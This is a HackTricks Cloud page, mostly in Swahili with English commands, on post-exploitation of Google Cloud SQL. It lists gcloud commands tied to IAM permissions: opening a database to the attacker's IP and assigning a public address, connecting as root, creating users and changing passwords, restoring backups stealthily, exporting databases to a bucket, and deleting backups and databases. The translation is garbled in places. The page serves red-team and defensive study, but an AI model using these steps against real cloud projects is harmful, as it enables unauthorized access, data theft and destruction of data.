GCP - Cloud SQL Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud SQL

Kwa maelezo zaidi kuhusu Cloud SQL angalia:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

Ili kuungana na hifadhidata unahitaji tu ufikiaji wa bandari ya hifadhidata na kujua jina la mtumiaji na nenosiri, hakuna mahitaji ya IAM. Hivyo, njia rahisi ya kupata ufikiaji, ikizingatiwa kwamba hifadhidata ina anwani ya IP ya umma, ni kuboresha mitandao iliyoidhinishwa na kuruhusu anwani yako ya IP kuweza kuifikia.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Ni pia inawezekana kutumia --no-backup ku haribu nakala za akiba za hifadhidata.

Kwa kuwa hizi ndizo mahitaji, siko wazi kabisa ni ruhusa zipi cloudsql.instances.connect na cloudsql.instances.login zinahusiana nazo. Ikiwa unajua, tuma PR!

`cloudsql.users.list`

Pata orodha ya watumiaji wote wa hifadhidata:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

Ruhusa hii inaruhusu kuunda mtumiaji mpya ndani ya hifadhidata:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

Ruhusa hii inaruhusu k updating mtumiaji ndani ya database. Kwa mfano, unaweza kubadilisha nenosiri lake:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Backups zinaweza kuwa na habari nyeti za zamani, hivyo ni muhimu kuziangalia. Rejesha nakala ya akiba ndani ya hifadhidata:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Ili kufanya hivyo kwa njia ya siri zaidi, inashauriwa kuunda mfano mpya wa SQL na kurejesha data hapo badala ya kwenye hifadhidata zinazotembea sasa.

`cloudsql.backupRuns.delete`

Ruhusa hii inaruhusu kufuta nakala za akiba:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Export a database kwa Cloud Storage Bucket ili uweze kuipata kutoka hapo:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

`cloudsql.instances.import`, `storage.objects.get`

Ingiza database (andika upya) kutoka kwa Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Futa database kutoka kwa mfano wa db:

gcloud sql databases delete <db-name> --instance <instance-id>

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 1 month ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete